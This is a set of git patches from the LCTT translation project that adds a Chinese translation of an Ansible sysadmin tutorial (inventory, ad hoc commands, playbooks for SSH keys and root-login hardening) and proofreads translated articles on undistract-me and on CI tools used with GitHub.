other distributions. - -### Working with Ansible Inventory - -Ansible uses an INI-style file called an _Inventory_ to track which servers it may manage. By default this file is located in **/etc/ansible/hosts**. In this article, I will use the Ansible Inventory shown in Example 2 to perform actions against the desired hosts (which has been paired down for brevity): - -##### Example 2: Ansible hosts file -``` -[arch] -nextcloud -prometheus -desktop1 -desktop2 -vm-host15 - -[fedora] -netflix - -[centos] -conan -confluence -7-repo -vm-server1 -gitlab - -[ubuntu] -trusty-mirror -nwn -kids-tv -media-centre -nas - -[satellite] -satellite - -[ocp] -lb00 -ocp_dns -master01 -app01 -infra01 -``` - -Each group, which is denoted via square brackets and a group name (such as **[group1]** ), is an arbitrary group name that can be applied to a set of servers. A server can exist in multiple groups without issue. In this case, I have groups for operating systems ( _arch_ , _ubuntu_ , _centos_ , _fedora_ ), as well as server function ( _ocp_ , _satellite_ ). The Ansible host file can handle significantly more advanced functionality than what I am using. For more information, see [the Inventory documentation][3]. - -### Running ad hoc commands - -After you have copied your SSH keys to all the servers in your inventory, you are ready to start using Ansible. A basic Ansible function is the ability to run ad hoc commands. The syntax is: -``` -ansible -a "some command" -``` - -For example, if you want to update all of the CentOS servers, you might run: -``` -ansible centos -a 'yum update -y' -``` - - _Note: Having group names based on the operating system of the server is not necessary. As I will discuss,[Ansible Facts][4] can be used to gather this information; however, issuing ad hoc commands becomes more complex when trying to use Facts, and so for convenience I recommend creating a few groups based on operating system if you manage a heterogeneous environment._ - -This will loop over each of the servers in the group **centos** and install all of the updates. A more useful ad hoc command would be the Ansible **ping** module, which is used to verify that a server is ready to receive commands: -``` -ansible all -m ping -``` - -This will result in Ansible attempting to log in via SSH to all of the servers in your inventory. Truncated output for the **ping** command can be seen in Example 3. - -##### Example 3: Ansible ping command output -``` -nwn | SUCCESS => { - "changed": false, - "ping": "pong" -} -media-centre | SUCCESS => { - "changed": false, - "ping": "pong" -} -nas | SUCCESS => { - "changed": false, - "ping": "pong" -} -kids-tv | SUCCESS => { - "changed": false, - "ping": "pong" -} -... -``` - -The ability to run ad hoc commands is useful for quick tasks, but what if you want to be able to run the same tasks later, in a repeatable fashion? For that Ansible implements [playbooks][5]. - -### Ansible playbooks for complex tasks - -An Ansible playbook is a YAML file that contains all the instructions that Ansible should complete during a run. For the purposes of this exercise, I will not get into more advanced topics such as Roles and Templates. If you are interested in learning more, [the documentation][6] is a great place to start. - -In the previous section, I encouraged you to use the **ssh-copy-id** command to propagate your SSH keys; however, this article is focused on how to accomplish tasks in a consistent, repeatable manner. Example 4 demonstrates one method for ensuring, in an idempotent fashion, that an SSH key exists on the target hosts. - -##### Example 4: Ansible playbook "push_ssh_keys.yaml" -``` ---- -- hosts: all - gather_facts: false - vars: - ssh_key: '/root/playbooks/files/laptop_ssh_key' - tasks: - - name: copy ssh key - authorized_key: - key: "{{ lookup('file', ssh_key) }}" - user: root -``` - -In the playbook from Example 4, all of the critical sections are highlighted. - -The **\- hosts:** line indicates which host groups the playbook should evaluate. In this particular case, it is going to examine all of the hosts from our _Inventory_. - -The **gather_facts:** line instructs Ansible to attempt to find out detailed information about each host. I will examine this in more detail later. For now, **gather_facts** is set to **false** to save time. - -The **vars:** section, as one might imagine, is used to define variables that can be used throughout the playbook. In such a short playbook as the one in Example 4, it is more a convenience rather than a necessity. - -Finally the main section is indicated by **tasks:**. This is where most of the instructions are located. Each task should have a **\- name:**. This is what is displayed as Ansible is carrying out a **run** , or playbook execution. - -The **authorized_key:** heading is the name of the Ansible Module that the playbook is using. Information about Ansible Modules can be accessed on the command line via **ansible-doc -a** ; however it may be more convenient to view the [documentation][7] in a web browser. The [authorized_key module][8] has plenty of great examples to get started with. To run the playbook in Example 4, simply use the **ansible-playbook** command: -``` -ansible-playbook push_ssh_keys.yaml -``` - -If this is the first time adding an SSH key to the box, SSH will prompt you for a password for the root user. - -Now that your servers have SSH keys propagated its time to do something a little more interesting. - -### Ansible and gathering facts - -Ansible has the ability to gather all kinds of facts about the target system. This can consume a significant amount of time if you have a large number of hosts. In my experience, it can take 1 to 2 seconds per host, and possibly longer; however, there are benefits to fact gathering. Consider the following playbook used for turning off the ability for users to log in with a password as the root user: - -##### Example 5: Lock down root SSH account - -``` ---- -- hosts: all - gather_facts: true - vars: - tasks: - - name: Enabling ssh-key only root access - lineinfile: - dest: /etc/ssh/sshd_config - regexp: '^PermitRootLogin' - line: 'PermitRootLogin without-password' - notify: - - restart_sshd - - restart_ssh - - handlers: - - name: restart_sshd - service: - name: sshd - state: restarted - enabled: true - when: ansible_distribution == 'RedHat' - - name: restart_ssh - service: - name: ssh - state: restarted - enabled: true - when: ansible_distribution == 'Debian' -``` - -In Example 5 the **sshd_config** file is modified with the [conditional][9] only executes if a distribution match is found. In this case Red Hat-based distributions name their SSH service different than Debian-based, which is the purpose for the conditional statement. Although there are other ways to achieve this same effect, the example helps demonstrate Ansible facts. If you want to see all of the facts that Ansible gathers by default, you can run the **setup** module on your localhost: -``` -ansible localhost -m setup |less - -``` - -Any fact that is discovered by Ansible can be used to base decisions upon much the same way the **vars:** section that was shown in Example 4 is used. The difference is Ansible facts are considered to be **built in** variables, and thus do not have to be defined by the administrator. - -### Next steps - -Now you have the tools to start investigating Ansible and creating your own playbooks. Ansible is a tool that has so much depth, complexity, and flexibility that it would be impossible to cover everything in one article. This article should be enough to pique your interest and inspire you to explore the possibilities Ansible provides. In my next article, I will discuss the **Copy** , **systemd** , **service** , **apt** , **yum** , **virt** , and **user** modules. We can combine these to create update and installation playbooks, and to create a basic Git server to store all of the playbooks that may get created. - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/7/automate-sysadmin-ansible - -作者:[Steve Ovens][a] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/stratusss -[1]:https://opensource.com/tags/ansible -[2]:http://docs.ansible.com/ansible/intro_installation.html -[3]:http://docs.ansible.com/ansible/intro_inventory.html -[4]:http://docs.ansible.com/ansible/playbooks_variables.html#information-discovered-from-systems-facts -[5]:http://docs.ansible.com/ansible/playbooks.html -[6]:http://docs.ansible.com/ansible/playbooks_roles.html -[7]:http://docs.ansible.com/ansible/modules_by_category.html -[8]:http://docs.ansible.com/ansible/authorized_key_module.html -[9]:http://docs.ansible.com/ansible/lineinfile_module.html diff --git a/translated/tech/20170724 How to automate your system administration tasks with Ansible.md b/translated/tech/20170724 How to automate your system administration tasks with Ansible.md new file mode 100644 index 0000000000..3ed869f06e --- /dev/null +++ b/translated/tech/20170724 How to automate your system administration tasks with Ansible.md @@ -0,0 +1,297 @@ +使用 Ansible 让你的系统管理自动化 +====== +![配图 ](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/BUSINESS_google_wave.png?itok=2oh8TpUi) +你是否想精进你的系统管理能力和 Linux 技能?也许你的本地局域网上跑了一些东西,而你又想让生活更轻松一点--那该怎么办呢?在本文中,我会向你演示如何设置工具来多机管理的工作。 + +远程管理工具有很多,SaltStack,Puppet,Chef,以及 [Ansible][1] 都是很流行的选择。在本文中,我将重点放在 Ansible 上并会解释它是如何帮到你的,不管你是有 5 台还是 1000 太虚拟机。 + +让我们从多机(不管这些机器是虚拟的还是物理的)的基本管理开始。我假设你知道要做什么,有基础的 Linux 管理技能(至少要有能找出执行每个任务具体步骤的能力)。我会向你演示如何使用这一工具,而是否使用它由你自己决定。 + +### 什么是 Ansible? + +Ansible 的网站上将之解释为 "一个超级简单的 IT 自动化引擎,可以自动进行云供应,配置管理,应用部署,服务内部协调,以及其他很多 IT 需求。" 通过在一个集中的位置定义好服务器集合,Ansible 可以在多个服务器上执行相同的任务。 + +如果你对 Bash 的 for 循环很熟悉,你会发现 Ansible 操作跟这很类似。区别在于 Ansible 是 _幕等的_。通俗来说就是 Ansible 一般只有在确实会发生改变时才执行所请求的动作。比如,假设你执行一个 Bash 的 for 循环来为多个机器创建用户,像这样子: +``` +for server in serverA serverB serverC; do ssh ${server} "useradd myuser"; done +``` + +这会在 **serverA**,**serverB**,以及 **serverC** 上创建 **myuser** 用户; 然而不管这个用户是否存在,每次运行这个 for 循环时都会执行 **user add** 命令。一个幕等的系统会首先检查用户是否存在,只有在不存在的情况下才会去创建它。当然,这个例子很简单,但是幕等工具的好处将会随着时间的推移变得越发明显。 + +#### Ansible 是如何工作的? + +Ansible 会将 _Ansible playbooks_ 转换成通过 SSH 运行的命令,这在管理类 UNIX 环境时有很多优势: + + 1。绝大多数类 UNIX 机器默认都开了 SSH。 + 2。依赖 SSH 意味着远程主机不需要有代理。 + 3。大多数情况下都无需安装额外的软件,Ansible 需要 2.6 或更新版本的 Python。而绝大多数 Linux 发行版默认都安装了这一版本(或者更新版本)的 Python。 + 4。Ansible 无需主节点。他可以在任何安装有 Ansible 并能通过 SSH 访问的主机上运行。 + 5。虽然可以在 cron 中运行 Ansible,但默认情况下,Ansible 只会在你明确要求的情况下运行。 + + + +#### 配置 SSH 密钥认证 + +使用 Ansible 的一种常用方法是配置无需密码的 SSH 密钥登陆以方便管理。(可以使用 Ansible Vault 来为密码等敏感信息提供保护,但不在本文的讨论范围之内)。现在只需要使用下面命令来生成一个 SSH 密钥,如示例 1 所示。 + +##### 示例 1:生成一个 SSH 密钥 +``` +[09:44 user ~]$ ssh-keygen +Generating public/private rsa key pair。 +Enter file in which to save the key (/home/user/.ssh/id_rsa): +Created directory '/home/user/.ssh'。 +Enter passphrase (empty for no passphrase): +Enter same passphrase again: +Your identification has been saved in /home/user/.ssh/id_rsa。 +Your public key has been saved in /home/user/.ssh/id_rsa.pub。 +The key fingerprint is: +SHA256:TpMyzf4qGqXmx3aqZijVv7vO9zGnVXsh6dPbXAZ+LUQ user@user-fedora +The key's randomart image is: ++---[RSA 2048]----+ +| | +| | +| E | +| o . .。| +| . + S o+。| +| . .o * . .+ooo| +| . .+o o o oo+。*| +|。.ooo* o。* .*+| +| . o+*BO.o+ .o| ++----[SHA256]-----+ +``` + +在示例 1 中,直接按下_回车_键来接受默认值。任何非特权用户都能生成 SSH 密钥,也能安装到远程系统中任何用户的 SSH **授权密钥** 文件中。生成密钥后,还需要将之拷贝到远程主机上去,运行下面命令: +``` +ssh-copy-id root@servera +``` + +_注意:运行 Ansible 本身无需 root 权限; 然而如果你使用非 root 用户,你_需要_为要执行的任务配置合适的 **sudo** 权限。_ + +输入 **servera** 的 root 密码,这条命令会将你的 SSH 密钥安装到远程主机上去。安装好 SSH 密钥后,再通过 SSH 登陆远程主机就不再需要输入 root 密码了。 + +### 安装 Ansible + +只需要在例 1 中生成 SSH 密钥的那台主机上安装 Ansible。若你使用的是 Fedora,输入下面命令: +``` +sudo dnf install ansible -y +``` + +若运行的是 CentOS,你需要为 Enterprise Linux (EPEL) 仓库配置额外的包: +``` +sudo yum install epel-release -y +``` + +然后再使用 yum 来安装 Ansible: +``` +sudo yum install ansible -y +``` + +对于基于 Ubuntu 的系统,可以从 PPA 上安装 Ansible: +``` +sudo apt-get install software-properties-common -y +sudo apt-add-repository ppa:ansible/ansible +sudo apt-get update +sudo apt-get install ansible -y +``` + +若你使用的是 macOS,那么推荐通过 Python PIP 来安装: +``` +sudo pip install ansible +``` + +对于其他发行版,请参见 [Ansible 安装文档 ][2]。 + +### Ansible Inventory + +Ansible 使用一个 INI 风格的文件来追踪要管理的服务器,这个文件被称之为 _Inventory_。默认情况下该文件位于 **/etc/ansible/hosts**。本文中,我使用例 2 中所示的 Ansible Inventory 来对所需的主机进行操作(为了简洁期间已经进行了裁剪): + +##### Example 2:Ansible hosts file +``` +[arch] +nextcloud +prometheus +desktop1 +desktop2 +vm-host15 + +[fedora] +netflix + +[centos] +conan +confluence +7-repo +vm-server1 +gitlab + +[ubuntu] +trusty-mirror +nwn +kids-tv +media-centre +nas + +[satellite] +satellite + +[ocp] +lb00 +ocp_dns +master01 +app01 +infra01 +``` + +每个分组由中括号和组名标识 (像这样 **[group1]** ),是应用于一组服务器的任意组名。一台服务器可以存在于多个组中,没有任何问题。在这个案例中,我有根据操作系统进行的分组( _arch_,_ubuntu_,_centos_,_fedora_ ),也有根据服务器功能进行的分组( _ocp_,_satellite_ )。Ansible host 文件可以处理比这复杂的多的情况。详细内容,请参阅 [the Inventory documentation][3]。 + +### 运行命令 + +将你的 SSH 密钥拷贝到 inventory 中所有服务器上后,你就可以开始使用 Ansible 了。Ansible 的一项基本功能就是运行特定命令。语法为: +``` +ansible -a "some command" +``` + +例如,假设你想升级所有的 CentOS 服务器,可以运行: +``` +ansible centos -a 'yum update -y' +``` + +_注意:不是必须要根据服务器操作系统来进行分组的。我下面会提到,[Ansible Facts][4] 可以用来收集这一信息; 然而,若使用 Facts 的话,则运行特定命令会变得很复杂,因此,如果你在管理异构环境的话,那么为了方便起见,我推荐创建一些根据操作系统来划分的组。_ + +这回遍历 **centos** 组中的所有服务器并安装所有的更新。一个更加有用的命令应该是 Ansible 的 **ping** 模块了,可以用来验证服务器是否准备好接受命令了: +``` +ansible all -m ping +``` + +这会让 Ansible 尝试通过 SSH 登陆 inventory 中的所有服务器。在案例 3 中可以看到 **ping** 命令的部分输出结果。 + +##### Example 3:Ansible ping command output +``` +nwn | SUCCESS => { + "changed":false, + "ping":"pong" +} +media-centre | SUCCESS => { + "changed":false, + "ping":"pong" +} +nas | SUCCESS => { + "changed":false, + "ping":"pong" +} +kids-tv | SUCCESS => { + "changed":false, + "ping":"pong" +} +.。。 +``` + +运行指定命令的能力有助于完成快速任务(译者注:应该指的那种一次性任务),但是如果我想在以后也能以同样的方式运行同样的任务那该怎么办呢?Ansible [playbooks][5] 就是用来做这个的。 + +### 复杂任务使用 Ansible playbooks + +Ansible playbook 就是包含 Ansible 指令的 YAML 格式的文件。我这里不打算讲解类似 Roles 和 Templates 这些比较高深的内容。有兴趣的话,请阅读 [Ansible 文档 ][6]。 + +在前一章节,我推荐你使用 **ssh-copy-id** 命令来传递你的 SSH 密钥; 然而,本文关注于如何以一种一致的,可重复性的方式来完成任务。案例 4 演示了一种以暮等的方式,即使 SSH 密钥已经存在于目标主机上也能保证正确性的实现方法。 + +##### Example 4:Ansible playbook "push_ssh_keys.yaml" +``` +--- +- hosts:all + gather_facts:false + vars: + ssh_key:'/root/playbooks/files/laptop_ssh_key' + tasks: + - name:copy ssh key + authorized_key: + key:"{{ lookup('file',ssh_key) }}" + user:root +``` + +例 4 中的 playbook 中所有的关键部分都被高亮了。 + +**\- hosts:** 行标识了这个 playbook 应该在那个主机组上执行。在这个例子中,它会检查 _Inventory_ 里的所有主机。 + +**gather_facts:** 行指明 Ansible 是否去搜索每个主机的详细信息。我稍后会做一次更详细的检查。现在为了节省时间,我们设置 **gather_facts** 为 **false**。 + +**vars:** 部分,顾名思义,就是用来定义 playbook 中所用变量的。在例 4 的这个简短 playbook 中其实不是必要的,但是按惯例我们还是设置了一个变量。 + +最后由 **tasks:** 标注的这个部分,是存放主体指令的地方。每个任务都有一个 **\- name:**。Ansbile 在运行 playbook 时会显示这个名字。 + +**authorized_key:** 是 playbook 所使用 Ansible Module 的名字。可以通过命令 `ansible-doc -a` 来查询 Ansible Module 的相关信息; 不过通过网络浏览器查看 [文档 ][7] 可能更方便一些。[authorized_key 模块 ][8] 有很多很好的例子可以参考。要运行例 4 中的 playbook,只要运行 **ansible-playbook** 命令就行了: +``` +ansible-playbook push_ssh_keys.yaml +``` + +如果是第一次添加 SSH 密钥,SSH 会提示你输入 root 用户的密码。 + +现在 SSH 密钥已经传输到服务器中去了,可以来做点有趣的事了。 + +### 使用 Ansible 收集信息 (gathering facts) + +Ansible 能够收集目标系统的各种信息。如果你的主机数量很多,那它会特别的耗时。按我的经验,每台机大概要花个 1 到 2 秒钟,甚至更长时间; 然而有时收集信息是有好处的。考虑下面这个 playbook,它会禁止 root 用户通过密码远程登陆系统: + +##### Example 5:Lock down root SSH account + +``` +--- +- hosts:all + gather_facts:true + vars: + tasks: + - name:Enabling ssh-key only root access + lineinfile: + dest:/etc/ssh/sshd_config + regexp:'^PermitRootLogin' + line:'PermitRootLogin without-password' + notify: + - restart_sshd + - restart_ssh + + handlers: + - name:restart_sshd + service: + name:sshd + state:restarted + enabled:true + when:ansible_distribution == 'RedHat' + - name:restart_ssh + service: + name:ssh + state:restarted + enabled:true + when:ansible_distribution == 'Debian' +``` + +在案例 5 中 **sshd_config** 文件的修改是有[条件 ][9] 的,只有在找到匹配的发行版的情况下才会执行。在这个案例中,基于 Red Hat 的发行版与基于 Debian 的发行版对 SSH 服务的命名是不一样的,这也是使用条件语句的目的所在。虽然也有其他的方法可以达到相同的效果,但这个例子很好演示了 Ansible facts 的作用。若你想查看 Ansible 默认收集的所有信息,可以在本地运行 **setup** 模块: +``` +ansible localhost -m setup |less + +``` + +Ansible 收集的所有信息都能用来做判断,就跟案例 4 中 **vars:** 部分所演示的一样。所不同的是,Ansible facts 被看成是**内置** 变量,无需由系统管理员定义。 + +### 更近一步 + +现在可以开始探索 Ansible 并创建自己的 playbooks 了。Ansible 是一个富有深度,复杂性,和灵活性的工具,只靠一篇文章不可能就把它讲透。希望本文能够激发你的兴趣,鼓励你去探索 Ansible 的功能。在下一篇文章中,我会再聊聊 **Copy**,**systemd**,**service**,**apt**,**yum**,**virt**,以及 **user** 模块。我们可以在 playbook 中组合使用这些模块,还可以创建一个简单的 Git 服务器来存储这些所有 playbook。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/7/automate-sysadmin-ansible + +作者:[Steve Ovens][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/stratusss +[1]:https://opensource.com/tags/ansible +[2]:http://docs.ansible.com/ansible/intro_installation.html +[3]:http://docs.ansible.com/ansible/intro_inventory.html +[4]:http://docs.ansible.com/ansible/playbooks_variables.html#information-discovered-from-systems-facts +[5]:http://docs.ansible.com/ansible/playbooks.html +[6]:http://docs.ansible.com/ansible/playbooks_roles.html +[7]:http://docs.ansible.com/ansible/modules_by_category.html +[8]:http://docs.ansible.com/ansible/authorized_key_module.html +[9]:http://docs.ansible.com/ansible/lineinfile_module.html From de6385828773bcb74f54ca3423b294fc4307a2b8 Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 26 Dec 2017 14:22:15 +0800 Subject: [PATCH 0790/1627] PRF&PUB:20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md @geekpi --- ...Long Running Terminal Commands Complete.md | 38 +++++++++---------- 1 file changed, 18 insertions(+), 20 deletions(-) rename {translated/tech => published}/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md (73%) diff --git a/translated/tech/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md b/published/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md similarity index 73% rename from translated/tech/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md rename to published/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md index 26a087d440..bd73524acd 100644 --- a/translated/tech/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md +++ b/published/20171130 Undistract-me_Get Notification When Long Running Terminal Commands Complete.md @@ -1,13 +1,11 @@ Undistract-me:当长时间运行的终端命令完成时获取通知 ============================================================ -作者:[sk][2],时间:2017.11.30 - ![Undistract-me](https://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2-720x340.png) 前一段时间,我们发表了如何[在终端活动完成时获取通知][3]。今天,我发现了一个叫做 “undistract-me” 的类似工具,它可以在长时间运行的终端命令完成时通知你。想象这个场景。你运行着一个需要一段时间才能完成的命令。与此同时,你查看你的 Facebook,并参与其中。过了一会儿,你记得你几分钟前执行了一个命令。你回到终端,注意到这个命令已经完成了。但是你不知道命令何时完成。你有没有遇到这种情况?我敢打赌,你们大多数人遇到过许多次这种情况。这就是 “undistract-me” 能帮助的了。你不需要经常检查终端,查看命令是否完成。长时间运行的命令完成后,undistract-me 会通知你。它能在 Arch Linux、Debian、Ubuntu 和其他 Ubuntu 衍生版上运行。 -#### 安装 Undistract-me +### 安装 Undistract-me Undistract-me 可以在 Debian 及其衍生版(如 Ubuntu)的默认仓库中使用。你要做的就是运行下面的命令来安装它。 @@ -17,19 +15,19 @@ sudo apt-get install undistract-me Arch Linux 用户可以使用任何帮助程序从 AUR 安装它。 -使用 [Pacaur][4]: +使用 [Pacaur][4]: ``` pacaur -S undistract-me-git ``` -使用 [Packer][5]: +使用 [Packer][5]: ``` packer -S undistract-me-git ``` -使用 [Yaourt][6]: +使用 [Yaourt][6]: ``` yaourt -S undistract-me-git @@ -53,7 +51,7 @@ echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_runnin echo "source /usr/share/undistract-me/long-running.bash\nnotify_when_long_running_commands_finish_install" >> .zshrc ``` -最后更新更改: +最后让更改生效。 对于 Bash: @@ -67,29 +65,29 @@ source ~/.bashrc source ~/.zshrc ``` -#### 配置 Undistract-me +### 配置 Undistract-me -默认情况下,Undistract-me 会将任何超过 10 秒的命令视为长时间运行的命令。你可以通过编辑 /usr/share/undistract-me/long-running.bash 来更改此时间间隔。 +默认情况下,Undistract-me 会将任何超过 10 秒的命令视为长时间运行的命令。你可以通过编辑 `/usr/share/undistract-me/long-running.bash` 来更改此时间间隔。 ``` sudo nano /usr/share/undistract-me/long-running.bash ``` -找到 “LONG_RUNNING_COMMAND_TIMEOUT” 变量并将默认值(10 秒)更改为你所选择的其他值。 +找到 `LONG_RUNNING_COMMAND_TIMEOUT` 变量并将默认值(`10` 秒)更改为你所选择的其他值。 - [![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png)][7] +[![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-1.png)][7] -保存并关闭文件。不要忘记更新更改: +保存并关闭文件。不要忘记让更改生效: ``` source ~/.bashrc ``` -此外,你可以禁用特定命令的通知。为此,找到 “LONG_RUNNING_IGNORE_LIST” 变量并像下面那样用空格分隔命令。 +此外,你可以禁用特定命令的通知。为此,找到 `LONG_RUNNING_IGNORE_LIST` 变量并像下面那样用空格分隔命令。 -默认情况下,只有当活动窗口不是命令运行的窗口时才会显示通知。也就是说,只有当命令在后台“终端”窗口中运行时,它才会通知你。如果该命令在活动窗口终端中运行,则不会收到通知。如果你希望无论终端窗口可见还是在后台都发送通知,你可以将 IGNORE_WINDOW_CHECK 设置为 1 以跳过窗口检查。 +默认情况下,只有当活动窗口不是命令运行的窗口时才会显示通知。也就是说,只有当命令在后台终端窗口中运行时,它才会通知你。如果该命令在活动窗口终端中运行,则不会收到通知。如果你希望无论终端窗口可见还是在后台都发送通知,你可以将 `IGNORE_WINDOW_CHECK` 设置为 `1` 以跳过窗口检查。 -Undistract-me 的另一个很酷的功能是当命令完成时,你可以设置音频通知和可视通知。默认情况下,它只会发送一个可视通知。你可以通过在命令行上将变量 UDM_PLAY_SOUND 设置为非零整数来更改此行为。但是,你的 Ubuntu 系统应该安装 pulseaudio-utils 和 sound-theme-freedesktop 程序来启用此功能。 +Undistract-me 的另一个很酷的功能是当命令完成时,你可以设置音频通知和可视通知。默认情况下,它只会发送一个可视通知。你可以通过在命令行上将变量 `UDM_PLAY_SOUND` 设置为非零整数来更改此行为。但是,你的 Ubuntu 系统应该安装 pulseaudio-utils 和 sound-theme-freedesktop 程序来启用此功能。 请记住,你需要运行以下命令来更新所做的更改。 @@ -107,11 +105,11 @@ source ~/.zshrc 现在是时候来验证这是否真的有效。 -#### 在长时间运行的终端命令完成时获取通知 +### 在长时间运行的终端命令完成时获取通知 现在,运行任何需要超过 10 秒或者你在 Undistract-me 脚本中定义的时间的命令 -我在 Arch Linux 桌面上运行以下命令。 +我在 Arch Linux 桌面上运行以下命令: ``` sudo pacman -Sy @@ -119,9 +117,9 @@ sudo pacman -Sy 这个命令花了 32 秒完成。上述命令完成后,我收到以下通知。 - [![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png)][8] +[![](http://www.ostechnix.com/wp-content/uploads/2017/11/undistract-me-2.png)][8] -请记住,只有当给定的命令花了超过 10 秒才能完成,Undistract-me 脚本才会通知你。如果命令在 10 秒内完成,你将不会收到通知。当然,你可以按照上面的“配置”部分所述更改此时间间隔设置。 +请记住,只有当给定的命令花了超过 10 秒才能完成时,Undistract-me 脚本才会通知你。如果命令在 10 秒内完成,你将不会收到通知。当然,你可以按照上面的“配置”部分所述更改此时间间隔设置。 我发现这个工具非常有用。在我迷失在其他任务上时,它帮助我回到正事。我希望这个工具也能对你有帮助。 @@ -139,7 +137,7 @@ via: https://www.ostechnix.com/undistract-get-notification-long-running-terminal 作者:[sk][a] 译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 4660f5a2ca85c8e4b75f0c3378d6373ae4c33cc8 Mon Sep 17 00:00:00 2001 From: wxy Date: Tue, 26 Dec 2017 14:40:09 +0800 Subject: [PATCH 0791/1627] PRF&PUB:20171107 GitHub welcomes all CI tools.md @geekpi --- .../20171107 GitHub welcomes all CI tools.md | 33 +++++-------------- 1 file changed, 9 insertions(+), 24 deletions(-) rename {translated/tech => published}/20171107 GitHub welcomes all CI tools.md (77%) diff --git a/translated/tech/20171107 GitHub welcomes all CI tools.md b/published/20171107 GitHub welcomes all CI tools.md similarity index 77% rename from translated/tech/20171107 GitHub welcomes all CI tools.md rename to published/20171107 GitHub welcomes all CI tools.md index a20d164014..ef86f5a82b 100644 --- a/translated/tech/20171107 GitHub welcomes all CI tools.md +++ b/published/20171107 GitHub welcomes all CI tools.md @@ -1,70 +1,55 @@ -GitHub 欢迎所有 CI 工具 +GitHub 欢迎一切 CI 工具 ==================== - [![GitHub and all CI tools](https://user-images.githubusercontent.com/29592817/32509084-2d52c56c-c3a1-11e7-8c49-901f0f601faf.png)][11] -持续集成([CI][12])工具可以帮助你在每次提交时执行测试,并将[报告结果][13]提交到合并请求,从而帮助维持团队的质量标准。结合持续交付([CD][14])工具,你还可以在多种配置上测试你的代码,运行额外的性能测试,并自动执行每个步骤[直到产品][15]。 +持续集成([CI][12])工具可以帮助你在每次提交时执行测试,并将[报告结果][13]提交到合并请求,从而帮助维持团队的质量标准。结合持续交付([CD][14])工具,你还可以在多种配置上测试你的代码,运行额外的性能测试,并自动执行每个步骤,[直到进入产品阶段][15]。 -有几个[与 GitHub 集成][16]的 CI 和 CD 工具,其中一些可以在 [GitHub Marketplace][17] 中点击几下安装。有了这么多的选择,你可以选择最好的工具 - 即使它不是与你的系统预集成的工具。 +有几个[与 GitHub 集成][16]的 CI 和 CD 工具,其中一些可以在 [GitHub Marketplace][17] 中点击几下安装。有了这么多的选择,你可以选择最好的工具 —— 即使它不是与你的系统预集成的工具。 最适合你的工具取决于许多因素,其中包括: * 编程语言和程序架构 - * 你计划支持的操作系统和浏览器 - * 你团队的经验和技能 - * 扩展能力和增长计划 - * 依赖系统的地理分布和使用的人 - * 打包和交付目标 -当然,无法为所有这些情况优化你的 CI 工具。构建它们的人需要选择哪些情况服务更好,何时优先考虑复杂性而不是简单性。例如,如果你想测试针对一个平台的用特定语言编写的小程序,那么你就不需要那些可在数十个平台上测试,有许多编程语言和框架的,用来测试嵌入软件控制器的复杂工具。 +当然,无法为所有这些情况优化你的 CI 工具。构建它们的人需要选择哪些情况下服务更好,何时优先考虑复杂性而不是简单性。例如,如果你想测试针对一个平台的用特定语言编写的小程序,那么你就不需要那些可在数十个平台上测试,有许多编程语言和框架的,用来测试嵌入软件控制器的复杂工具。 -如果你需要一些灵感来挑选最好使用哪个 CI 工具,那么看一下[ Github 上的流行项目][18]。许多人在他们的 README.md 中将他们的集成的 CI/CD 工具的状态显示为徽章。我们还分析了 GitHub 社区中超过 5000 万个仓库中 CI 工具的使用情况,并发现了很多变化。下图显示了根据我们的 pull 请求中使用最多的[提交状态上下文][19],GitHub.com 使用的前 10 个 CI 工具的相对百分比。 +如果你需要一些灵感来挑选最好使用哪个 CI 工具,那么看一下 [Github 上的流行项目][18]。许多人在他们的 README.md 中将他们的集成的 CI/CD 工具的状态显示为徽章。我们还分析了 GitHub 社区中超过 5000 万个仓库中 CI 工具的使用情况,并发现了很多变化。下图显示了根据我们的拉取请求中使用最多的[提交状态上下文][19],GitHub.com 使用的前 10 个 CI 工具的相对百分比。 _我们的分析还显示,许多团队在他们的项目中使用多个 CI 工具,使他们能够发挥它们最擅长的。_ - [![Top 10 CI systems used with GitHub.com based on most used commit status contexts](https://user-images.githubusercontent.com/7321362/32575895-ea563032-c49a-11e7-9581-e05ec882658b.png)][20] +[![Top 10 CI systems used with GitHub.com based on most used commit status contexts](https://user-images.githubusercontent.com/7321362/32575895-ea563032-c49a-11e7-9581-e05ec882658b.png)][20] 如果你想查看,下面是团队中使用最多的 10 个工具: * [Travis CI][1] - * [Circle CI][2] - * [Jenkins][3] - * [AppVeyor][4] - * [CodeShip][5] - * [Drone][6] - * [Semaphore CI][7] - * [Buildkite][8] - * [Wercker][9] - * [TeamCity][10] 这只是尝试选择默认的、预先集成的工具,而没有花时间根据任务研究和选择最好的工具,但是对于你的特定情况会有很多[很好的选择][21]。如果你以后改变主意,没问题。当你为特定情况选择最佳工具时,你可以保证量身定制的性能和不再适合时互换的自由。 准备好了解 CI 工具如何适应你的工作流程了么? -[浏览 GitHub Marketplace][22] +- [浏览 GitHub Marketplace][22] -------------------------------------------------------------------------------- via: https://github.com/blog/2463-github-welcomes-all-ci-tools 